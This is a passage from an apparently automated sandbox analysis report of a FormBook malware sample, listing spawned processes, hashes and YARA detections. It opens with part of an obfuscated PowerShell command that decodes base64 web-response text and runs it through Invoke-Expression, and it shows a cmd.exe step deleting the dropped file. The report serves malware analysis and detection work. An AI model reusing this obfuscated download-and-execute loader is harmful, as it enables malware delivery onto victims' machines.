116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($676544567888888888876545666778)|I`E`X
                                        Imagebase:0x7ff617cb0000
                                        File size:447488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        General

                                        Start time:17:59:46
                                        Start date:22/07/2021
                                        Path:C:\Windows\SysWOW64\calc.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0x9a0000
                                        File size:26112 bytes
                                        MD5 hash:0975EE4BD09E87C94861F69E4AA44B7A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Start time:17:59:48
                                        Start date:22/07/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff693d90000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Start time:18:00:14
                                        Start date:22/07/2021
                                        Path:C:\Windows\SysWOW64\help.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\help.exe
                                        Imagebase:0x1f0000
                                        File size:10240 bytes
                                        MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Start time:18:00:18
                                        Start date:22/07/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del 'C:\WINDOWS\syswow64\calc.exe'
                                        Imagebase:0x150000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:18:00:19
                                        Start date:22/07/2021
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7ecfc0000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis

                                        Reset < >